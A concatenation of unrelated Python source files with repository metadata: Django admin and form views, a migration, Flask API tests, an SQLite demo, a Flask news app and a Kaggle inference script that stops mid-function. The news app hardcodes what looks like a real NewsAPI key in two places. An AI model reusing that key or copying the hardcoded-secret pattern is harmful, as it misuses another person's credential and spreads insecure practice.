593744e9a93eac6acc19145fbf21f947a6a9a309 | 68b91532e97ed9fa6f299880418f2e1556fa8e09 | /sign/admin.py | c782bf4438eb6c1a99d7c84c4f766b9194774402 | [] | no_license | ffaa30703/python_webtest | 492e35ba6182d4b35ce656ca998329b35a9662ca | df445bfba017afc4faa92a3cea25420fdef1a00a | refs/heads/master | 2020-06-22T09:47:16.325807 | 2019-07-19T03:15:36 | 2019-07-19T03:15:36 | 197,693,602 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 499 | py | from django.contrib import admin
from sign.models import Event, Guest
# Register your models here.
class EventAdmin(admin.ModelAdmin):
    """Admin options for Event: listing columns, name search, status filter."""
    list_display = ['id', 'name', 'status', 'address', 'start_time']
    search_fields = ['name']
    list_filter = ['status']
class GuestAdmin(admin.ModelAdmin):
    """Admin options for Guest: sign-in listing with search on real name."""
    list_display = ['realname', 'phone', 'email', 'sign', 'create_time', 'event']
    search_fields = ['realname']

# Register both models with their customized admin classes.
admin.site.register(Event, EventAdmin)
admin.site.register(Guest, GuestAdmin)
| [
"ffaa30703@icloud.com"
] | ffaa30703@icloud.com |
78ec6e48e8c2ef6d7fc07399022eb1070c47acab | 6f04a28ac7128137dc68aea09363e4666d285ce3 | /car/migrations/0015_alter_car_options.py | c8d5ffe8c2bd93ab468870a884983b203be33e30 | [] | no_license | Temiwe/django_cars | 8cb1166318bff2aef81d1c44ccbccea2f3c9c4e6 | a740393aa02eb7714e03fa43edf73be352c3a76b | refs/heads/main | 2023-06-06T08:12:50.752552 | 2021-07-02T14:06:06 | 2021-07-02T14:06:06 | 376,011,672 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 343 | py | # Generated by Django 3.2.4 on 2021-06-26 10:27
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated Django migration: default ordering of Car by ``car_model``."""

    dependencies = [
        ('car', '0014_auto_20210611_1454'),
    ]

    operations = [
        # Only Meta options change; no schema alteration is performed.
        migrations.AlterModelOptions(
            name='car',
            options={'ordering': ['car_model']},
        ),
    ]
| [
"vasilishin.a@icloud.com"
] | vasilishin.a@icloud.com |
72d2f9bd36e51696367187201ee7d11f8268d192 | c78ed0ab5d6321b536654986d69b137279a5f258 | /test_API.py | a02944fbf8b46786fd235deb1bb02c1d2597688c | [] | no_license | lstrait2/Wikipedia-Scraper | 597f84e1d0d47740fca1a6771c435dc5ddab06c9 | 23cab179a144d790abc303f87536d0450d76f104 | refs/heads/master | 2021-09-13T23:32:06.960510 | 2018-05-05T18:24:43 | 2018-05-05T18:24:43 | 106,033,539 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,953 | py | from model.graph.graph import Graph
import app
import json
import unittest
class APITestCase(unittest.TestCase):
def setUp(self):
app.app.config['TESTING'] = True
self.flask_app = app.app.test_client()
self.graph_data = Graph('model/data/data.json').to_json()
# test a request to an invalid URL
def test_get_invalid_url(self):
res = self.flask_app.get('/api/invalid/actors/Bruce Willis')
# should throw 404
self.assertEqual(res.status_code, 404)
# test a valid GET request for an actor
def test_get_actor_valid(self):
res = self.flask_app.get('/api/actors/Bruce Willis')
# request should be successful
self.assertEqual(res.status_code, 200)
# read res data into dictionary
data = json.loads(res.data)
# compare response data to stored JSON
self.assertEqual(data, self.graph_data[0]['Bruce Willis'])
# Test an invalid GET request for an actor
def test_get_actor_invalid(self):
res = self.flask_app.get('/api/actors/afafafafaf')
# request should be unsuccessful
self.assertEqual(res.status_code, 400)
# check that custom error handler was invoked
data = json.loads(res.data)
self.assertEqual(data, {'status': "Bad request. Make sure you are providing valid parameters"})
# Test a valid GET request for a movie
def test_get_movie_valid(self):
res = self.flask_app.get('/api/movies/Pulp Fiction')
# request should be successful
self.assertEqual(res.status_code, 200)
# read res data into dictionary
data = json.loads(res.data)
# compare response data to stored JSON
self.assertEqual(data, self.graph_data[1]['Pulp Fiction'])
# Test a valid GET request for a movie
def test_get_movie_invalid(self):
res = self.flask_app.get('/api/movies/dfkadkadz')
# request should be unsuccessful
self.assertEqual(res.status_code, 400)
# check that custom error handler was invoked
data = json.loads(res.data)
self.assertEqual(data, {'status': "Bad request. Make sure you are providing valid parameters"})
# Test a valid GET request for movies
def test_get_movies_valid(self):
res = self.flask_app.get('/api/movies/?name="Pulp Fiction"')
# request should be successful
self.assertEqual(res.status_code, 200)
# read res data into dictionary
data = json.loads(res.data)
# Pulp Fiction should be in data response
self.assertEqual(data['Pulp Fiction'], self.graph_data[1]['Pulp Fiction'])
# Pulp Fiction should be only movie in data response
self.assertEqual(len(data.keys()), 1)
# Test a valid GET request for movies, more complex querystring
def test_get_movies_complex(self):
res = self.flask_app.get('/api/movies/?name="Pulp Fiction"|box_office=24')
# request should be successful
self.assertEqual(res.status_code, 200)
# read res data into dictionary
data = json.loads(res.data)
# Pulp Fiction should be in data response
self.assertEqual(data['Pulp Fiction'], self.graph_data[1]['Pulp Fiction'])
# The Bye Bye Man should also be in data response
self.assertEqual(data['The Bye Bye Man'], self.graph_data[1]['The Bye Bye Man'])
# Nothing else should be in data
self.assertEqual(len(data.keys()), 2)
# Test a valid GET request for movies, more complex querystring
def test_get_movies_complex_boolean_exp(self):
res = self.flask_app.get('/api/movies/?name="Pulp Fiction"|box_office=24&actors="John Travolta"')
# request should be successful
self.assertEqual(res.status_code, 200)
# read res data into dictionary
data = json.loads(res.data)
# Pulp Fiction should be in data response
self.assertEqual(data['Pulp Fiction'], self.graph_data[1]['Pulp Fiction'])
# Nothing else should be in data
self.assertEqual(len(data.keys()), 1)
# Test a invalid GET request for movies
def test_get_movies_invalid(self):
res = self.flask_app.get('/api/movies/?name="Unknown Fake Name')
# request should be successful
self.assertEqual(res.status_code, 200)
# check that response data is empty
data = json.loads(res.data)
self.assertEqual(data, {})
# Test a valid GET request for actors
def test_get_actors_valid(self):
res = self.flask_app.get('/api/actors/?name="Bruce Willis"')
# request should be successful
self.assertEqual(res.status_code, 200)
# read res data into dictionary
data = json.loads(res.data)
# compare response data to stored JSON
self.assertEqual(data['Bruce Willis'], self.graph_data[0]['Bruce Willis'])
# Bruce Willis should be only actor in data response
self.assertEqual(len(data.keys()), 1)
# Test a valid GET request for actors, more complex querystring
def test_get_actors_valid_complex(self):
res = self.flask_app.get('/api/actors/?age=94|name="Bruce Willis')
# request should be successful
self.assertEqual(res.status_code, 200)
# read res data into dictionary
data = json.loads(res.data)
# compare response data to stored JSON
self.assertEqual(data['Bruce Willis'], self.graph_data[0]['Bruce Willis'])
self.assertEqual(data['Steven Hill'], self.graph_data[0]['Steven Hill'])
self.assertEqual(data['Abe Vigoda'], self.graph_data[0]['Abe Vigoda'])
self.assertEqual(len(data.keys()), 3)
# Test a invalid GET request for actors
def test_get_actors_invalid(self):
res = self.flask_app.get('/api/actors/?name="Unknown Fake Name')
# request should be successful
self.assertEqual(res.status_code, 200)
# check that response data is empty
data = json.loads(res.data)
self.assertEqual(data, {})
# Test a invalid GET request for actors
def test_get_actors_invalid_param(self):
res = self.flask_app.get('/api/actors/?stuff="Unknown Fake Name')
# request should be successful
self.assertEqual(res.status_code, 200)
# check that response data is empty
data = json.loads(res.data)
self.assertEqual(data, {})
# Test a valid PUT request for a movie
def test_put_movie_valid(self):
res = self.flask_app.put('/api/movies/Pulp Fiction', data=json.dumps({'box_office': 500}),
headers={'Content-Type': 'application/json'})
# request should be successful
self.assertEqual(res.status_code, 200)
data = json.loads(res.data)
# check that box office was updated
self.assertEqual(data['box_office'], 500)
# if we now do a get request new value should be reflected
res2 = self.flask_app.get('/api/movies/Pulp Fiction')
# request should be successful
self.assertEqual(res2.status_code, 200)
# read res data into dictionary
data = json.loads(res2.data)
# changed value should appear still
self.assertEqual(data['box_office'], 500)
# Test a invalid PUT request for a movie
def test_put_movie_invalid(self):
res = self.flask_app.put('/api/movies/Pulp Fiction', data=json.dumps({'boxO': 500}),
headers={'Content-Type': 'application/json'})
# request should not be successful
self.assertEqual(res.status_code, 400)
# if we now do a get request data should be unchanged
res2 = self.flask_app.get('/api/movies/Pulp Fiction')
# request should be successful
self.assertEqual(res2.status_code, 200)
# read res data into dictionary
data = json.loads(res2.data)
# changed value should appear still
self.assertEqual(data['box_office'], 213)
# Test a invalid PUT request for a movie
def test_put_movie_invalid_content_type(self):
res = self.flask_app.put('/api/movies/Pulp Fiction', data=json.dumps({'box_office': 500}),
headers={'Content-Type': 'application/text'})
# request should not be successful
self.assertEqual(res.status_code, 400)
# if we now do a get request data should be unchanged
res2 = self.flask_app.get('/api/movies/Pulp Fiction')
# request should be successful
self.assertEqual(res2.status_code, 200)
# read res data into dictionary
data = json.loads(res2.data)
# changed value should appear still
self.assertEqual(data['box_office'], 213)
# Test a valid PUT request for an actor
def test_put_actor_valid(self):
res = self.flask_app.put('/api/actors/Bruce Willis', data=json.dumps({'total_gross': 500}),
headers={'Content-Type': 'application/json'})
# request should be successful
self.assertEqual(res.status_code, 200)
data = json.loads(res.data)
# check that total gross was updated
self.assertEqual(data['total_gross'], 500)
# if we now do a get request new value should be reflected
res2 = self.flask_app.get('/api/actors/Bruce Willis')
# request should be successful
self.assertEqual(res2.status_code, 200)
# read res data into dictionary
data = json.loads(res2.data)
# changed value should appear still
self.assertEqual(data['total_gross'], 500)
# Test a invalid PUT request for an actor
def test_put_actor_invalid(self):
res = self.flask_app.put('/api/actors/Bruce Willis', data=json.dumps({'tgross': 500}),
headers={'Content-Type': 'application/json'})
# request should be successful
self.assertEqual(res.status_code, 400)
# if we now do a get request no change should have made
res2 = self.flask_app.get('/api/actors/Bruce Willis')
# request should be successful
self.assertEqual(res2.status_code, 200)
# read res data into dictionary
data = json.loads(res2.data)
# changed value should appear still
self.assertEqual(data['total_gross'], 562709189)
# Test a valid POST request for an actor
def test_post_movie_valid(self):
res = self.flask_app.post('/api/movies/', data=json.dumps({'name': "Some New Movie"}),
headers={'Content-Type': 'application/json'})
# request should be successful - 201 for created
self.assertEqual(res.status_code, 201)
data = json.loads(res.data)
# check that new movie appears in output
self.assertEqual(data, {'name': "Some New Movie"})
# if we now do a get request new value should be reflected
res2 = self.flask_app.get('/api/movies/Some New Movie')
# request should be successful
self.assertEqual(res2.status_code, 200)
# read res data into dictionary
data = json.loads(res2.data)
# changed value should appear
self.assertEqual(data, {'name': "Some New Movie"})
# Test a invalid POST request for an movie
def test_post_movie_invalid_no_name(self):
res = self.flask_app.post('/api/movies/', data=json.dumps({'year': 2007}),
headers={'Content-Type': 'application/json'})
# request should be unsuccessful
self.assertEqual(res.status_code, 400)
data = json.loads(res.data)
# check that error output appears
self.assertEqual(data, {'status': "Bad request. Make sure you are providing valid parameters"})
# Test a invalid POST request for an movie
def test_post_movie_invalid_wrong_type(self):
res = self.flask_app.post('/api/movies/', data=json.dumps({'name': 'some_new_movie'}),
headers={'Content-Type': 'application/text'})
# request should be unsuccessful
self.assertEqual(res.status_code, 400)
data = json.loads(res.data)
# check that error output appears
self.assertEqual(data, {'status': "Bad request. Make sure you are providing valid parameters"})
# Test a valid POST request for an actor
def test_post_actor_valid(self):
res = self.flask_app.post('/api/actors/', data=json.dumps({'name': "Some New Actor"}),
headers={'Content-Type': 'application/json'})
# request should be successful - 201 for created
self.assertEqual(res.status_code, 201)
data = json.loads(res.data)
# check that new movie appears in output
self.assertEqual(data, {'name': "Some New Actor"})
# if we now do a get request new value should be reflected
res2 = self.flask_app.get('/api/actors/Some New Actor')
# request should be successful
self.assertEqual(res2.status_code, 200)
# read res data into dictionary
data = json.loads(res2.data)
# changed value should appear
self.assertEqual(data, {'name': "Some New Actor"})
# Test a invalid POST request for an actor
def test_post_actor_invalid_no_name(self):
res = self.flask_app.post('/api/actors/', data=json.dumps({'age': 20}),
headers={'Content-Type': 'application/json'})
# request should be unsuccessful
self.assertEqual(res.status_code, 400)
data = json.loads(res.data)
# check that error output appears
self.assertEqual(data, {'status': "Bad request. Make sure you are providing valid parameters"})
# Test a invalid POST request for an actor
def test_post_actor_invalid_wrong_type(self):
res = self.flask_app.post('/api/actors/', data=json.dumps({'name': 'some_new_actor'}),
headers={'Content-Type': 'application/text'})
# request should be unsuccessful
self.assertEqual(res.status_code, 400)
data = json.loads(res.data)
# check that error output appears
self.assertEqual(data, {'status': "Bad request. Make sure you are providing valid parameters"})
# Test successful DELETE request for movie
def test_delete_movie_valid(self):
res = self.flask_app.delete('/api/movies/Ed')
self.assertEquals(res.status_code, 200)
data = json.loads(res.data)
# success message should appear
self.assertEqual({'status': "Deletion of Ed was successful"}, data)
# should not be able to look up deleted movie
res = self.flask_app.get('/api/movies/Ed')
self.assertEqual(res.status_code, 400)
# Test unsuccessful DELETE request for movie
def test_delete_movie_invalid(self):
res = self.flask_app.delete('/api/movies/some_movie')
# should fail
self.assertEquals(res.status_code, 400)
# Test successful DELETE request for actor
def test_delete_actor_valid(self):
res = self.flask_app.delete('/api/actors/Madeleine Stowe')
self.assertEquals(res.status_code, 200)
data = json.loads(res.data)
# success message should appear
self.assertEqual({'status': "Deletion of Madeleine Stowe was successful"}, data)
# should not be able to look up deleted movie
res = self.flask_app.get('/api/actors/Madeleine Stowe')
self.assertEqual(res.status_code, 400)
# Test unsuccessful DELETE request for actor
def test_delete_actor_invalid(self):
res = self.flask_app.delete('/api/actors/some_actor')
# should fail
self.assertEquals(res.status_code, 400)
if __name__ == '__main__':
    # Discover and run every test_* method in this module.
    unittest.main()
"lstrait2@d9c94b55-221a-4017-ad66-301122ff4019"
] | lstrait2@d9c94b55-221a-4017-ad66-301122ff4019 |
e8f1d5c9e09a71f694045e5a65ce896486a2da64 | e4042f342f611ebf829f56946c46bbb9af7e2d2a | /app.py | 5c4b86dfbdd6e635a25c2f5ca1d9e2778a1deabe | [] | no_license | ivxxi/flasknews | 8c3a41566ea205f6a82cd9c5dce5c159d589d2ac | 5090692311333fb4c1bcf345fe7143b3d87a66b4 | refs/heads/master | 2022-09-20T08:07:31.641415 | 2020-05-30T12:21:08 | 2020-05-30T12:21:08 | 268,073,878 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,312 | py | from flask import Flask, render_template
from newsapi import NewsApiClient
app = Flask(__name__)
@app.route('/')
def index():
    """Render the home page with top headlines from Al Jazeera English."""
    # NOTE(review): the API key should come from configuration, not source.
    newsapi = NewsApiClient(api_key="89978371303b45eb819a53f77fc04e5d")
    topheadlines = newsapi.get_top_headlines(sources="al-jazeera-english")
    articles = topheadlines['articles']
    # Iterate the articles directly instead of indexing with range(len(...)).
    news = [article['title'] for article in articles]
    desc = [article['description'] for article in articles]
    img = [article['urlToImage'] for article in articles]
    # zip the parallel lists into (title, description, image) tuples
    mylist = zip(news, desc, img)
    return render_template('index.html', context=mylist)
@app.route('/bbc')
def bbc():
    """Render the BBC page with top headlines from BBC News."""
    # NOTE(review): the API key should come from configuration, not source.
    newsapi = NewsApiClient(api_key="89978371303b45eb819a53f77fc04e5d")
    topheadlines = newsapi.get_top_headlines(sources="bbc-news")
    articles = topheadlines['articles']
    # Iterate the articles directly instead of indexing with range(len(...)).
    news = [article['title'] for article in articles]
    desc = [article['description'] for article in articles]
    img = [article['urlToImage'] for article in articles]
    # zip the parallel lists into (title, description, image) tuples
    mylist = zip(news, desc, img)
    return render_template('bbc.html', context=mylist)
if __name__ == "__main__":
    # Run the Flask development server (debug: auto-reload + tracebacks).
    app.run(debug=True)
| [
"crystalalice21@gmail.com"
] | crystalalice21@gmail.com |
ce5b510de836023c484377ea5231f685d4fc5fd1 | 69813e81a08c8ec041ad874661e0fcc9771f8ed0 | /Lab-3/lab3-database-demo.py | 3a885fccd4272387d5630bfc23c853f6862df8f3 | [] | no_license | jackharold/SYSC3010_jack_harold | 9fdcaca96caa40ce5420306712a6698c1159f102 | 2355d9818eac5affadee577b658b68fd2292f8c6 | refs/heads/master | 2022-12-25T18:45:01.487610 | 2020-10-09T19:13:59 | 2020-10-09T19:13:59 | 295,858,194 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,728 | py | #!/usr/bin/env python3
import sqlite3
# Connect to the database file (created on first use).
dbconnect = sqlite3.connect("main.db")

# If we want to access columns by name we need to set
# row_factory to the sqlite3.Row class.
dbconnect.row_factory = sqlite3.Row

# Cursor used for all statements below.
cursor = dbconnect.cursor()

# Bug fix: the original INSERT assumed a pre-existing `temps` table and
# crashed on a fresh database -- create it first.
cursor.execute('''create table if not exists temps
                  (tdate text, ttime text, zone text, temperature real)''')

# Parameterized INSERT instead of values inlined into the SQL string.
cursor.execute('insert into temps values (?, ?, ?, ?)',
               ('01-Jan', '12:01 PM', 'kitchen', 21.0))
dbconnect.commit()

# Simple SELECT; print each row, accessing columns by name.
cursor.execute('SELECT * FROM temps')
for row in cursor:
    print(row['tdate'], row['ttime'], row['zone'], row['temperature'])

# Demo cleanup: empty the temps table again.
cursor.execute('DELETE FROM temps')
dbconnect.commit()

# Creating the second table (sensors) and repopulating it.
cursor.execute('create table if not exists sensors(sensorID integer, type text, zone text)')
cursor.execute('delete from sensors')
dbconnect.commit()

typeInit = ["door", "temperature", "door", "motion", "temperature"]
zoneInit = ["kitchen", "kitchen", "garage", "garage", "garage"]
# Parameterized bulk insert replaces the original string-concatenated SQL.
cursor.executemany('insert into sensors values (?, ?, ?)',
                   [(i + 1, typeInit[i], zoneInit[i]) for i in range(5)])
dbconnect.commit()

cursor.execute('select * from sensors')

print("Searching for all sensors in the kitchen:")
cursor.execute("select * from sensors where zone = 'kitchen'")
for row in cursor:
    print(row['sensorID'], row['type'], row['zone'])
print("")

print("Searching for all door sensors:")
cursor.execute("select * from sensors where type = 'door'")
for row in cursor:
    print(row['sensorID'], row['type'], row['zone'])
print("")

dbconnect.close()
| [
"jackharold019@gmail.com"
] | jackharold019@gmail.com |
fc10948d86708b6f47a13b0e303228135646e05a | e76f6fdb1a2ea89d4f38ac1ed28e50a7625e21b7 | /qytdjg_learning/views/Form.py | f0c4967d53b2ea07c09c61e006a240cff2f1d5c2 | [] | no_license | collinsctk/qytdjg_learning | 4d61a2a236f0bc4bf9be8d999352a8e3c1b87408 | 72a6d6153f6ca6bf9fccad76612450fdaf83d9fd | refs/heads/master | 2020-03-24T19:45:31.145059 | 2018-07-31T06:51:14 | 2018-07-31T06:51:14 | 142,943,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,628 | py | #!/usr/bin/env python3
# -*- coding=utf-8 -*-
# 本脚由亁颐堂现任明教教主编写,用于乾颐盾Python课程!
# 教主QQ:605658506
# 亁颐堂官网www.qytang.com
# 教主技术进化论拓展你的技术新边疆
# https://ke.qq.com/course/271956?tuin=24199d8a
from django.http import HttpResponse
from django.shortcuts import render_to_response
from django.shortcuts import render
# Forms
# Get information about the client's request
def requestInfo(request):
    """Return an HttpResponse listing basic request attributes.

    Shows path, host, full path, port, HTTPS flag and (when present) the
    Accept header from request.META.
    """
    result = 'path: %s ' % request.path
    result = result + '<br>host: %s ' % request.get_host()
    result = result + '<br>full_path %s ' % request.get_full_path()
    result = result + '<br>port: %s ' % request.get_port()
    result = result + '<br>https: %s ' % request.is_secure()
    # request.META: Python dict containing all HTTP request headers
    try:
        result = result + '<br>Accept: %s ' % request.META['HTTP_ACCEPT']
    except KeyError:
        result = result + '<br>HTTP请求头获取异常'
    # The commented block below would dump every key/value in request.META:
    # values = request.META.items()
    # sorted(values)
    # html = []
    # for key,value in values:
    #     html.append('<tr><td>%s</td><td>%s</td></tr>' % (key,value))
    #
    # return HttpResponse('<table>%s</table>' % '\n'.join(html))
    return HttpResponse(result)
# Handle data submitted by the search form
def searchForm(request):
    """Render the empty search form page."""
    template_name = 'search_form.html'
    return render_to_response(template_name)
# def search(request):
# if 'name' in request.GET:
# message = 'You searched for:%s' % request.GET['name']
# else:
# message = 'You submmited an empty form.'
# return HttpResponse(message)
# 从数据库查询数据
from mt.models import Movie
# def search(request):
# if 'name' in request.GET:
# name = request.GET['name']
# movies = Movie.objects.filter(type__icontains=name)
# return render_to_response('search_results.html', {'movies':movies, 'query':name})
# else:
# return HttpResponse('Pls submit a search term.')
# Improved form: re-render the form page with results or an error flag
def search(request):
    """Search movies whose type contains the submitted GET param `name`."""
    if 'name' in request.GET:
        name = request.GET['name']
        # Case-insensitive substring match on the movie type.
        movies = Movie.objects.filter(type__icontains=name)
        return render_to_response('search_form_ext.html', {'movies': movies, 'query': name})
    else:
        # No `name` parameter at all: show the form with an error marker.
        return render_to_response('search_form_ext.html', {'error': True})
# Simple form validation
def searchVerify1(request):
    """Validate the search term with a single boolean error flag.

    The term must be non-empty and at most 10 characters long.
    """
    error = False
    if 'name' in request.GET:
        name = request.GET['name']
        # name must be non-empty
        if not name:
            error = True
        elif len(name) > 10:
            error = True
        else:
            movies = Movie.objects.filter(type__icontains=name)
            return render_to_response('search_form_ext_verify.html', {'movies': movies, 'query': name})
    # NOTE(review): the `error` flag is computed but never passed on -- every
    # failure path renders with a hard-coded {'error': True}.
    return render_to_response('search_form_ext_verify.html', {'error': True})
def searchVerify(request):
    """Validate the search term, collecting human-readable error messages."""
    errors = []
    if 'name' in request.GET:
        name = request.GET['name']
        # name must be non-empty and at most 10 characters
        if not name:
            errors.append('请输入电影类型名')
        elif len(name) > 10:
            errors.append('电影类型名长度不能大于10')
        else:
            movies = Movie.objects.filter(type__icontains=name)
            return render_to_response('search_form_ext_verify2.html', {'movies': movies, 'query': name})
    # Re-render the form with whatever errors were collected (possibly none).
    return render_to_response('search_form_ext_verify2.html', {'errors': errors})
# Complex form validation: three required fields, errors accumulated
def searchVerifyad(request):
    """Validate `name`, `value1` and `value2`; search only when all are valid."""
    errors = []
    if 'name' in request.GET:
        name = request.GET['name']
        # Bug fix: direct request.GET['value1'] raised MultiValueDictKeyError
        # when the field was absent, defeating the validation below.
        value1 = request.GET.get('value1', '')
        value2 = request.GET.get('value2', '')
        # name must be non-empty
        if not name:
            errors.append('请输入电影类型名')
        if not value1:
            errors.append('必须提供value1')
        if not value2:
            errors.append('必须提供value2')
        if not errors:
            movies = Movie.objects.filter(type__icontains=name)
            # Bug fix: template name was misspelled 'search_form_ext_verifad.html'
            # (the error branch below uses 'verifyad').
            return render_to_response('search_form_ext_verifyad.html', {'movies': movies, 'query': name})
    return render_to_response('search_form_ext_verifyad.html', {'errors': errors})
# Writing a Form class
# django.forms.Form
# Using the Form object in a view
from mt.forms import MyForm
# from django.views.decorators.csrf import csrf_exempt
# @csrf_exempt
# from django.views.decorators.csrf import csrf_protect
# from django.middleware.csrf import get_token
# @csrf_protect
# def contact(request):
# # print(get_token(request))
# if request.method == 'POST':
# form = MyForm(request.POST)
# if form.is_valid():
# print('完成与业务相关的工作')
# return HttpResponse('OK')
# else:
# return render_to_response('my_form.html',{'form':form, 'csrf_token':get_token(request)})
# else:
# form = MyForm(initial={'name':'秦柯', 'email':'collinsctk@qytang.com', 'message':'没有信息'}) # 初始值
# return render_to_response('my_form.html',{'form':form, 'csrf_token':get_token(request)})
# Handling the CSRF problem: render() (unlike render_to_response) runs the
# context processors, so the csrf token reaches the template.
def contact(request):
    """Display and process the contact form.

    GET  -> render the form pre-filled with initial values.
    POST -> validate; on success do the business work, else re-render with errors.
    """
    # print(get_token(request))
    if request.method == 'POST':
        form = MyForm(request.POST)
        if form.is_valid():
            print('完成与业务相关的工作')
            return HttpResponse('OK')
        else:
            return render(request, 'my_form.html', {'form': form})
    else:
        form = MyForm(initial={'name': '秦柯', 'email': 'collinsctk@qytang.com', 'message': '没有信息'})  # initial values
        return render(request, 'my_form.html', {'form': form})
if __name__ == "__main__":
pass | [
"collinsctk@qytang.com"
] | collinsctk@qytang.com |
b346be7c08d4667def335dc1db37baaf9486db3f | 5ea13cd8f65c9a2d068d8f9778aea1a35850ea10 | /working/inference_clean.py | 70d9b529f9a826d73721ddeb20702487b08a4bff | [] | no_license | unonao/kaggle-inclass-gala | b6a0d076450022dc8df8e8c3d88b5b338933c071 | 3f140439bfdbda06ca54e41fe1aa9a7e32bfb450 | refs/heads/main | 2023-03-30T06:22:29.390521 | 2021-04-03T03:41:23 | 2021-04-03T03:41:23 | 341,119,317 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,561 | py | # misc を除いて、clean なデータのみで学習する
# Reshaped so the StratifiedKFold split matches the one used in the other scripts
import argparse
import json
import os
import datetime
import numpy as np
import pandas as pd
import torch
from torch import nn
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import log_loss
# Configure via a command-line --config argument (JSON file).
parser = argparse.ArgumentParser()
parser.add_argument('--config', default='./configs/clean.json')
options = parser.parse_args()
# NOTE(review): open() here is never closed; a `with` block would be cleaner.
CFG = json.load(open(options.config))

# Logger setup
from logging import getLogger, StreamHandler,FileHandler, Formatter, DEBUG, INFO
logger = getLogger("logger")  # acquire the logger named "logger"
logger.setLevel(DEBUG)  # the logger itself runs at DEBUG
# handler 1: console output
handler_stream = StreamHandler()
handler_stream.setLevel(DEBUG)
handler_stream.setFormatter(Formatter("%(asctime)s: %(message)s"))
# handler 2: log file named after the config file and model architecture
config_filename = os.path.splitext(os.path.basename(options.config))[0]
handler_file = FileHandler(filename=f'./logs/inference_clean_{config_filename}_{CFG["model_arch"]}.log')
handler_file.setLevel(DEBUG)
handler_file.setFormatter(Formatter("%(asctime)s: %(message)s"))
# attach both handlers to the logger
logger.addHandler(handler_stream)
logger.addHandler(handler_file)
from model.transform import get_train_transforms, get_valid_transforms, get_inference_transforms
from model.dataset import GalaDataset
from model.model import GalaImgClassifier
from model.epoch_api import train_one_epoch, valid_one_epoch, inference_one_epoch
from model.utils import seed_everything
# Test-set frame: one row per image file found in the Test_Images folder.
test = pd.DataFrame()
test['Image'] = list(os.listdir('../input/gala-images-classification/dataset/Test_Images'))
def load_clean_train_df(path):
    """For infer_clean: read the whole training CSV (misc rows included).

    Adds two columns: `is_misc` (1 when Class == "misc", else 0) and an
    integer `label` mapped from the Class name.
    """
    class_to_label = {"Attire": 0, "Food": 1, "Decorationandsignage": 2, "misc": 3}
    df = pd.read_csv(path)
    df["is_misc"] = df["Class"].eq("misc").astype(int)
    df["label"] = df["Class"].map(class_to_label)
    return df
def infer_clean():
    """Run k-fold inference with the 3-class ("clean", misc excluded) models.

    For each fold: load the saved checkpoints for CFG['used_epochs'], run
    weighted TTA inference on the fold's validation split and on the full
    test set, and accumulate out-of-fold (OOF) and test predictions.
    Returns the averaged test predictions; also writes OOF/test CSVs.
    """
    logger.debug("pred clean start")
    train = load_clean_train_df("../input/gala-images-classification/dataset/train.csv")
    seed_everything(CFG['seed'])
    folds = StratifiedKFold(n_splits=CFG['fold_num'], shuffle=True, random_state=CFG['seed']).split(np.arange(train.shape[0]), train.label.values)
    tst_preds = []
    val_loss = []
    val_acc = []
    # Create empty DataFrames with matching row counts (OOF / test predictions).
    cols = ["Attire", "Food", "Decorationandsignage"]
    oof_df = pd.DataFrame(index=[i for i in range(train.shape[0])], columns=cols)
    y_preds_df = pd.DataFrame(index=[i for i in range(test.shape[0])], columns=cols)
    for fold, (trn_idx, val_idx) in enumerate(folds):
        logger.debug('Inference fold {} started'.format(fold))
        input_shape = (CFG["img_size_h"], CFG["img_size_w"])
        valid_ = train.loc[val_idx, :].reset_index(drop=True)
        valid_ds = GalaDataset(valid_, '../input/gala-images-classification/dataset/Train_Images', transforms=get_inference_transforms(input_shape, CFG["transform_way"]), shape=input_shape, output_label=False)
        # Test-set loader (original note: for images judged not to be misc;
        # in practice the whole test frame is used -- TODO confirm intent).
        test_ds = GalaDataset(test, '../input/gala-images-classification/dataset/Test_Images', transforms=get_inference_transforms(input_shape, CFG["transform_way"]), shape=input_shape, output_label=False)
        val_loader = torch.utils.data.DataLoader(
            valid_ds,
            batch_size=CFG['valid_bs'],
            num_workers=CFG['num_workers'],
            shuffle=False,
            pin_memory=False,
        )
        tst_loader = torch.utils.data.DataLoader(
            test_ds,
            batch_size=CFG['valid_bs'],
            num_workers=CFG['num_workers'],
            shuffle=False,
            pin_memory=False,
        )
        device = torch.device(CFG['device'])
        #model = GalaImgClassifier(CFG['model_arch'], train.label.nunique()).to(device)
        model = GalaImgClassifier(CFG['model_arch'], train.label.nunique()-1).to(device)  # misc class excluded
        val_preds = []
        #for epoch in range(CFG['epochs']-3):
        for i, epoch in enumerate(CFG['used_epochs']):
            # Load the checkpoint saved by the training script for this fold/epoch.
            model.load_state_dict(torch.load(f'save/clean_{config_filename}_{CFG["model_arch"]}_fold_{fold}_{epoch}'))
            with torch.no_grad():
                # Weighted test-time augmentation: each pass contributes
                # weights[i]/sum(weights) of the final average.
                for _ in range(CFG['tta']):
                    val_preds += [CFG['weights'][i]/sum(CFG['weights'])*inference_one_epoch(model, val_loader, device)]
                    tst_preds += [CFG['weights'][i]/sum(CFG['weights'])*inference_one_epoch(model, tst_loader, device)]
        val_preds = np.mean(val_preds, axis=0)
        oof_df.loc[val_idx, cols] = val_preds
        # Validation loss/accuracy computed with the misc rows excluded.
        indx = valid_["Class"] != "misc"
        val_loss.append(log_loss(valid_.label.values[indx], val_preds[indx]))
        val_acc.append((valid_.label.values[indx] == np.argmax(val_preds[indx], axis=1)).mean())
        # Accuracy per probability threshold: predictions whose max probability
        # is below p are relabelled as misc (label 3).
        for p in CFG["prob_thres"]:
            label_preds = np.argmax(val_preds, axis=1)
            label_preds[val_preds.max(axis=1) < p] = 3
            logger.debug('fold {} (p={}) validation accuracy = {:.5f}'.format(fold, p, (valid_.label.values == label_preds).mean()))
    logger.debug('no misc validation loss = {:.5f}'.format( np.mean(val_loss)))
    logger.debug('no misc validation accuracy = {:.5f}'.format( np.mean(val_acc)))
    tst_preds = np.mean(tst_preds, axis=0)
    y_preds_df.loc[:, cols] = tst_preds  #.reshape(len(tst_preds), -1)
    # Save the OOF and test predictions.
